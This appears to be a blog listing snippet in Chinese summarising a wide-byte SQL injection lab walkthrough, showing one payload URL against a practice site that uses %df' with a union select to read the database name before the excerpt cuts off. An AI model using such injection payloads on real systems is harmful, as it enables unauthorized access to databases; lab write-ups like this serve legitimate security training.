摘要: 宽字节注入(一) 查询数据库名 http://inject2b.lab.aqlab.cn/Pass-15/index.php?id=1%df' union select 1,2,database() -- qwe 得出数据库名:widechar 查询当前库下表名 http://inject2b.la 阅读全文
posted @ 2021-09-06 11:26 hacker-裁决者 阅读(191) 评论(0) 推荐(0) 编辑